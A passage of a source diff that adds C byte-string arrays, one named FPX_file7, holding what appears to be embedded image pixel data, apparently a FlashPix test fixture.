+"\xeb\xeb\xed\xec\xec\xed\xec\xec\xed\xec\xec\xec\xea\xe9\xed\xec"
+"\xed\xed\xed\xee\xec\xeb\xea\xed\xec\xed\xec\xec\xec\xea\xe9\xe8"
+"\xea\xe7\xe4\xec\xea\xe9\xed\xed\xed\xec\xea\xe9\xec\xeb\xea\xed"
+"\xec\xec\xec\xeb\xeb\xec\xec\xec\xec\xeb\xea\xed\xec\xed\xed\xed"
+"\xee\xec\xeb\xeb\xed\xed\xef\xed\xec\xec\xed\xeb\xeb\xed\xec\xeb"
+"\xe6\xe9\xf0\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe8\xf0\xe8\xe8\xec\xeb"
+"\xe9\xe8\xec\xeb\xeb\xeb\xea\xea\xea\xe7\xe5\xec\xec\xed\xec\xea"
+"\xea\xed\xec\xed\xed\xec\xed\xec\xeb\xeb\xec\xec\xec\xec\xeb\xec"
+"\xec\xec\xec\xec\xeb\xeb\xeb\xea\xe9\xed\xec\xed\xeb\xe9\xe8\xec"
+"\xeb\xeb\xec\xec\xed\xec\xeb\xec\xec\xeb\xec\xec\xeb\xea\xed\xec"
+"\xee\xed\xec\xee\xec\xea\xe9\xec\xec\xed\xed\xec\xec\xeb\xe9\xe8"
+"\xe9\xe6\xe4\xeb\xea\xe9\xec\xec\xed\xeb\xe9\xe9\xec\xeb\xeb\xec"
+"\xec\xec\xec\xea\xea\xec\xec\xec\xec\xeb\xeb\xed\xec\xed\xed\xec"
+"\xee\xec\xeb\xea\xed\xec\xed\xec\xec\xed\xec\xeb\xec\xeb\xea\xea"
+"\xec\xeb\xeb\xed\xec\xee\xeb\xea\xea\xe5\xe6\xeb\xe6\xe9\xf1\xe6"
+"\xe9\xf1\xd9\xd7\xd5\xff\xff\xff\xff\xff\xff\xed\xeb\xea\xe5\xe8"
+"\xee\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xee\xeb\xe8"
+"\xfa\xf9\xf7\xfb\xfb\xf9\xfc\xfb\xf9\xfc\xfc\xfb\xfc\xfa\xf8\xfb"
+"\xfb\xfa\xfc\xfb\xfa\xfc\xfb\xfa\xfc\xfb\xfa\xfb\xfa\xf9\xfc\xfb"
+"\xfa\xfb\xfb\xfa\xfb\xfa\xf9\xfc\xfb\xfa\xfb\xfa\xfa\xfe\xfe\xfe"
+"\xfe\xfe\xfe\xfb\xfa\xf8\xf7\xf6\xf6\xf7\xf6\xf5\xfb\xfa\xf9\xfb"
+"\xfb\xfa\xfb\xfa\xf9\xfc\xfb\xfa\xfb\xfb\xfa\xfc\xfb\xfb\xfc\xfb"
+"\xfb\xfc\xfb\xf9\xfc\xfc\xfb\xfc\xfb\xfa\xfc\xfb\xfa\xfb\xfa\xf8"
+"\xe5\xe7\xeb\xe6\xe9\xf1\xe6\xe9\xf1\xe5\xe8\xee\xec\xe9\xe6\xf9"
+"\xf6\xf3\xfb\xfb\xf9\xff\xff\xff\xff\xff\xff\xfc\xfb\xfa\xfb\xfa"
+"\xf8\xfc\xfb\xfa\xfc\xfb\xfa\xfb\xfa\xf9\xfb\xfa\xf9\xfb\xfb\xf9"
+"\xfb\xfb\xfa\xfb\xfa\xf9\xfb\xfa\xf8\xfc\xfb\xf9\xfb\xf9\xf7\xfb"
+"\xfa\xf8\xfb\xfb\xfa\xfb\xfa\xf9\xfb\xfb\xf9\xfb\xfa\xf9\xfc\xfb"
+"\xfa\xfc\xfb\xfa\xfb\xfa\xf8\xfc\xfb\xfa\xfb\xfa\xf9\xfe\xfe\xfe"
+"\xfe\xfe\xfe\xfb\xfa\xf8\xfb\xfa\xf9\xfa\xf9\xf8\xfb\xfa\xf9\xfb"
+"\xfa\xf9\xfb\xfa\xf9\xfc\xfb\xfa\xfb\xfb\xf9\xfc\xfb\xfa\xfc\xfb"
+"\xfa\xfc\xfa\xf8\xfc\xfb\xfa\xfc\xfb\xfa\xfb\xfb\xfa\xfb\xfa\xf9"
+"\xfb\xfa\xf9\xfc\xfb\xfa\xfb\xfa\xf9\xe6\xe7\xea\xe6\xe9\xf1\xe6"
+"\xe9\xf1\xd9\xd7\xd5\xff\xff\xff\xff\xff\xff\xed\xed\xed\xe5\xe8"
+"\xef\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xf0\xee\xed"
+"\xfd\xfd\xfc\xfb\xfb\xfb\xf2\xf2\xf2\xf9\xf9\xf9\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xf5\xf6\xf6\xe9\xea\xea\xec\xec"
+"\xed\xdb\xdc\xdb\xdf\xe0\xe0\xea\xeb\xeb\xdb\xdb\xdb\xf1\xf1\xf1"
+"\xfc\xfc\xfc\xd8\xd8\xd9\xcd\xce\xcf\xd0\xd1\xd2\xdb\xdc\xdc\xe0"
+"\xe1\xe1\xe5\xe5\xe5\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfb\xfb"
+"\xfb\xf5\xf5\xf5\xf1\xf1\xf1\xff\xff\xff\xff\xff\xff\xfe\xfe\xfd"
+"\xe6\xe8\xed\xe6\xe9\xf1\xe6\xe9\xf1\xe5\xe8\xef\xee\xed\xed\xfc"
+"\xfc\xfb\xff\xff\xff\xff\xff\xff\xfc\xfc\xfc\xf6\xf6\xf6\xfe\xfe"
+"\xfe\xff\xff\xff\xff\xff\xff\xfa\xfa\xfb\xe6\xe6\xe7\xe8\xe8\xe9"
+"\xe5\xe5\xe6\xdc\xdc\xdd\xe5\xe6\xe6\xdf\xdf\xdf\xdc\xdc\xdc\xdb"
+"\xdb\xdc\xe5\xe6\xe6\xfa\xfa\xfa\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xe1\xe1\xe1\xea\xea\xea"
+"\xd9\xda\xd9\xe4\xe5\xe5\xe4\xe4\xe4\xdb\xdb\xdb\xe3\xe3\xe3\xde"
+"\xde\xde\xf6\xf6\xf6\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xf2\xf2\xf2\xf3\xf3\xf3\xfa\xfa\xfa"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xe7\xe8\xeb\xe6\xe9\xf1\xe6"
+"\xe9\xf1\xd9\xd7\xd5\xff\xff\xff\xff\xff\xff\xef\xf1\xf6\xe6\xe9"
+"\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xf4\xf5\xf6"
+"\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xf3\xea\xde\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xf7\xf8\xf8\xd2\xd3\xd3\xac\xad"
+"\xad\xd6\xd6\xd6\xe1\xe1\xe2\xd2\xd2\xd2\xd4\xd5\xd6\xed\xed\xed"
+"\xfa\xfa\xfa\xd1\xd1\xd1\xb4\xb5\xb4\xd3\xd3\xd3\xd7\xd7\xd7\xdf"
+"\xe0\xe0\xdd\xde\xdd\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xf0\xf2\xf6\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xcf\xcf\xcf\xde\xde\xde"
+"\xb3\xb3\xb2\xd5\xd6\xd5\xcf\xcf\xcf\xd1\xd1\xd1\xcf\xcf\xcf\xee"
+"\xef\xee\xd6\xd6\xd6\xf5\xf6\xf6\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xdc\xdc\xdc\xe7\xe7\xe7"
+"\xe5\xe5\xe6\x98\x9a\x9b\xdc\xdc\xdc\xee\xef\xee\xdf\xdf\xdf\xd5"
+"\xd5\xd6\xf9\xf9\xf9\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xe4\xe7\xeb\xe6\xe9\xf1\xe6"
+"\xe9\xf1\xd6\xcd\xc1\xff\xff\xff\xff\xff\xff\xe5\xdc\xd1\xe6\xe9"
+"\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xec\xe4\xdc"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfb\xf8\xf4\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfb\xfc"
+"\xfc\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xfb\xfb\xfb\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xe5\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xdd\xd0\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xf8\xf8\xf8\xff\xff\xff"
+"\xfa\xfb\xfc\xff\xff\xff\xfc\xfc\xfc\xfb\xfb\xfb\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xf9\xf9\xf9\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xe6\xe9\xf1\xe6\xe9\xf1\xe6"
+"\xe9\xf1\xdb\xdd\xe1\xff\xff\xff\xff\xff\xff\xee\xec\xec\xe5\xe8"
+"\xef\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xf1\xf0\xef"
+"\xfd\xfd\xfc\xff\xff\xff\xff\xff\xff\xfb\xf7\xf3\xf2\xe7\xd9\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfd\xfd"
+"\xfb\xfc\xfa\xf7\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xfe\xfe\xfd"
+"\xe6\xe8\xec\xe6\xe9\xf1\xe6\xe9\xf1\xe5\xe8\xee\xed\xec\xeb\xfc"
+"\xfb\xfa\xff\xff\xff\xff\xff\xff\xff\xff\xff\xf7\xf1\xe8\xf5\xed"
+"\xe2\xfd\xfc\xfb\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xfa\xf6\xf0\xfd\xfb\xf9\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xfd\xfc\xfa\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xfe\xfe\xfe\xfc\xfb\xf9\xfe\xfe\xfe\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xe7\xe7\xe9\xe6\xe9\xf1\xe6"
+"\xe9\xf1\xd8\xd5\xd3\xff\xff\xff\xff\xff\xff\xed\xec\xec\xe5\xe8"
+"\xef\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xf0\xee\xee"
+"\xfd\xfd\xfc\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfc\xfa\xf8\xfc"
+"\xfb\xf9\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xee\xdf\xca"
+"\xe5\xcb\xa8\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfa\xf6"
+"\xf1\xfb\xf8\xf5\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xfd\xfd"
+"\xe5\xe7\xec\xe6\xe9\xf1\xe6\xe9\xf1\xe5\xe8\xef\xee\xed\xed\xfc"
+"\xfc\xfb\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xfc\xf9"
+"\xf6\xf9\xf5\xf0\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xea\xd8\xbf\xe7\xd2\xb6\xfd\xfc\xfa\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xec\xdb\xc5\xfe\xfe\xfd\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xfe"
+"\xfe\xfd\xfc\xfa\xf9\xf5\xf0\xfc\xfa\xf8\xfe\xfe\xfe\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xe7\xe7\xea\xe6\xe9\xf1\xe6"
+"\xe9\xf1\xd8\xd6\xd3\xff\xff\xff\xff\xff\xff\xed\xec\xec\xe5\xe8"
+"\xef\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xed\xeb\xea"
+"\xfc\xfb\xfa\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xf3"
+"\xea\xdd\xfe\xfd\xfd\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xee\xdf\xca"
+"\xe5\xcb\xa8\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xfe\xfd\xf4\xec"
+"\xe1\xfe\xfe\xfd\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfd\xfd\xfc"
+"\xe6\xe7\xec\xe6\xe9\xf1\xe6\xe9\xf1\xe5\xe8\xef\xeb\xeb\xeb\xf9"
+"\xf8\xf6\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xf9\xf4\xee\xfa\xf7\xf2\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xf6\xee\xe3\xe0\xc4\x9e\xf5\xec\xe1\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xfa\xf6\xf1\xf6\xf0\xe6\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xf9\xf5"
+"\xef\xf1\xe6\xd7\xfb\xf8\xf4\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xfd\xfc\xfb\xe7\xe9\xee\xe6\xe9\xf1\xe6"
+"\xe9\xf1\xd9\xd7\xd6\xff\xff\xff\xff\xff\xff\xed\xec\xeb\xe5\xe8"
+"\xef\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe8\xe8\xeb"
+"\xf4\xf2\xee\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xf4"
+"\xed\xe2\xfd\xfc\xfa\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xee\xdf\xca"
+"\xe5\xcb\xa8\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfd\xfc\xfb\xf8\xf3"
+"\xec\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xf9\xf7\xf5"
+"\xe3\xe3\xe5\xe4\xe6\xec\xe5\xe8\xf0\xe6\xe9\xf1\xe6\xe8\xed\xed"
+"\xeb\xe9\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xfe\xfd\xfc\xfa\xf6\xf0\xfd\xfc\xfb\xfe\xfe\xfe\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xfd\xfb\xf9\xe4\xcc\xac\xe7\xd1\xb3\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xe9\xd6\xbb\xfd\xfc\xfa\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xf6\xf0"
+"\xe7\xf5\xed\xe1\xfd\xfd\xfb\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xfe\xfe\xfe\xfb\xfa\xf8\xf2\xf2\xf0\xe5\xe8\xee\xe6\xe9\xf1\xe6"
+"\xe9\xf1\xd9\xd7\xd5\xff\xff\xff\xff\xff\xff\xec\xea\xe8\xe5\xe7"
+"\xee\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1"
+"\xe6\xe7\xeb\xef\xed\xec\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xfc"
+"\xfa\xf7\xf0\xe4\xd3\xf7\xf1\xe9\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xee\xdf\xca"
+"\xe5\xcb\xa8\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xf9\xf4\xee\xf0\xe4\xd3\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xfd\xfd\xfc\xf3\xf2\xf0\xe2\xdd\xd6"
+"\xda\xcc\xb9\xdc\xd0\xc1\xe4\xe6\xec\xdd\xd5\xc9\xda\xcc\xb6\xde"
+"\xd6\xcb\xf0\xee\xec\xfc\xfb\xf8\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xfc\xfa\xf7\xf3\xe8\xda\xf9\xf3\xec\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfc\xfa\xf8\xe6\xd0\xb2\xfe"
+"\xfe\xfd\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xfd\xfd\xf0\xe5\xd5"
+"\xd8\xb3\x82\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xfe\xfe\xfe\xfd\xfb\xf9\xf3\xe9\xdd\xfe\xfd"
+"\xfd\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xfd\xfd"
+"\xed\xeb\xe9\xe7\xe8\xec\xe5\xe8\xf0\xe6\xe9\xf1\xe6\xe9\xf1\xe6"
+"\xe9\xf1\xd8\xd6\xd5\xff\xff\xff\xff\xff\xff\xed\xec\xec\xe5\xe8"
+"\xef\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1"
+"\xe5\xe8\xf0\xe8\xe8\xeb\xfe\xfd\xfd\xff\xff\xff\xff\xff\xff\xfe"
+"\xfe\xfe\xf9\xf4\xee\xf9\xf5\xef\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xee\xdf\xca"
+"\xe5\xcb\xa8\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+;
+
+unsigned char FPX_file7[] = 
+"\xff\xff\xff\xff\xff\xfe\xfe\xfe\xf9\xf4\xee\xf7\xf0\xe8\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xf7\xf5\xf3\xe8\xe6\xe3\xdc\xd4\xc6"
+"\xe1\xdf\xde\xe2\xe0\xe1\xe5\xe8\xee\xde\xd6\xcc\xd7\xc5\xaa\xd9"
+"\xca\xb3\xe5\xe4\xe5\xf2\xf1\xf0\xfe\xfe\xfe\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xfe\xfe\xfe\xfd\xfc\xfb\xf9\xf5\xef\xfd\xfc\xfb"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xef\xe2\xd0\xfa"
+"\xf6\xf1\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfa\xf6\xf0\xd1\xa7\x6d"
+"\xf9\xf5\xef\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xf6\xf0\xe7\xf7\xf1\xe9\xfc\xfb\xf9\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xfd\xfd\xfc\xf7\xf5\xf3"
+"\xe6\xe8\xee\xe5\xe8\xf0\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6"
+"\xe9\xf1\xd8\xd6\xd4\xff\xff\xff\xff\xff\xff\xec\xea\xe9\xe5\xe7"
+"\xee\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1"
+"\xe6\xe9\xf1\xe5\xe7\xed\xf8\xf7\xf5\xfe\xfe\xfe\xff\xff\xff\xff"
+"\xff\xff\xfe\xfe\xfe\xf7\xf1\xea\xfe\xfe\xfd\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xee\xdf\xca"
+"\xe5\xcb\xa8\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xf8\xf4\xed\xf8\xf3\xec\xfe\xfe\xfd\xff\xff"
+"\xff\xff\xff\xff\xfe\xfe\xfe\xed\xec\xeb\xdf\xd9\xd1\xd9\xcb\xb5"
+"\xe3\xe4\xe7\xe6\xe9\xf1\xe6\xe9\xf1\xe3\xe2\xe4\xde\xd6\xcb\xda"
+"\xcd\xb9\xe1\xde\xda\xe6\xe9\xf1\xe8\xe0\xd3\xfe\xfe\xfe\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfa\xf7\xf2\xf8\xf4\xed"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xf9\xf5\xef\xf0"
+"\xe3\xd0\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xf0\xe3\xd1\xdb\xbc\x91"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xfe\xfe\xfe\xf0\xe5\xd6\xf8\xf3\xec\xfe\xfe\xfe\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xfd\xfd\xfc\xf3\xf1\xed\xe9\xea\xeb"
+"\xe5\xe8\xf0\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6"
+"\xe9\xf1\xd9\xd7\xd6\xff\xff\xff\xff\xff\xff\xec\xeb\xea\xe5\xe8"
+"\xee\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1"
+"\xe6\xe9\xf1\xe6\xe9\xf1\xe8\xe9\xec\xf4\xf3\xf1\xfe\xfe\xfe\xff"
+"\xff\xff\xff\xff\xff\xfe\xfd\xfc\xfb\xf8\xf5\xfe\xfd\xfd\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xee\xdf\xca"
+"\xe5\xcb\xa8\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xfe\xfe\xfe\xf9\xf4\xee\xfd\xfb\xf9\xff\xff\xff\xff\xff"
+"\xff\xfe\xfe\xfe\xf5\xf3\xf0\xdd\xd6\xcb\xda\xce\xbc\xde\xd7\xce"
+"\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe4"
+"\xe7\xed\xd8\xca\xb5\xd7\xc9\xb4\xe2\xe1\xe0\xf1\xef\xed\xfb\xfa"
+"\xf8\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfa\xf6\xf1"
+"\xf0\xe4\xd4\xfa\xf6\xf0\xff\xff\xff\xff\xff\xff\xff\xff\xff\xe1"
+"\xc7\xa2\xf3\xe9\xdb\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xe2\xc7\xa4\xfd\xfb\xf9"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xf7"
+"\xf2\xea\xf0\xe5\xd5\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xfa\xf7\xf4\xe6\xe7\xeb\xe5\xe8\xef\xe6\xe9\xf1"
+"\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6"
+"\xe9\xf1\xd9\xd8\xd7\xff\xff\xff\xff\xff\xff\xed\xec\xec\xe5\xe8"
+"\xef\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1"
+"\xe6\xe9\xf1\xe6\xe9\xf1\xe5\xe7\xee\xeb\xeb\xed\xf8\xf6\xf3\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xf2\xe7\xda\xf8\xf4\xed\xfe\xfe"
+"\xfe\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xee\xdf\xca"
+"\xe5\xcb\xa8\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xfb\xf8\xf3\xfc\xfa\xf8\xff\xff\xff\xff\xff\xff\xfe\xfe"
+"\xfe\xf9\xf7\xf3\xec\xec\xec\xda\xd0\xc1\xdd\xd6\xcd\xe3\xe5\xe8"
+"\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe5"
+"\xe8\xf0\xde\xda\xd4\xd5\xc2\xa5\xda\xcf\xbe\xe6\xe5\xe6\xf2\xf0"
+"\xee\xfc\xfa\xf9\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xfd\xfc"
+"\xf6\xf0\xe6\xf9\xf4\xed\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xe7"
+"\xd3\xb7\xe7\xd3\xb7\xfd\xfc\xfa\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xfd\xfc\xfb\xe7\xd2\xb6\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xf8\xf2\xea\xfa"
+"\xf6\xf2\xfb\xf9\xf6\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xfd"
+"\xfc\xf7\xf5\xf2\xed\xec\xeb\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1"
+"\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6"
+"\xe9\xf1\xd8\xd5\xd3\xff\xff\xff\xff\xff\xff\xed\xeb\xeb\xe5\xe8"
+"\xee\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1\xe6\xe9\xf1"
